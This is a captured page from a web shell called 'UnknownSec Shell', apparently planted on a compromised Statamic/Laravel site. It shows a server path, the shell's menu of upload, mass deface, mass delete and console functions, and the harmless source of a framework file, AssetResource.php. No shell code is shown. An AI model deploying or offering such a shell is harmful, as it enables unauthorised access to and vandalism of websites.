shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
mpc.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Http
/
Resources
/
API
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
AssetResource.php
<?php namespace Statamic\Http\Resources\API; use Illuminate\Http\Resources\Json\JsonResource; class AssetResource extends JsonResource { /** * Transform the resource into an array. * * @param \Illuminate\Http\Request * @return array */ public function toArray($request) { $with = $this->blueprint() ->fields()->all() ->filter->isRelationship()->keys()->all(); return $this->resource ->toAugmentedCollection() ->withRelations($with) ->withShallowNesting() ->toArray(); } }
© 2026 UnknownSec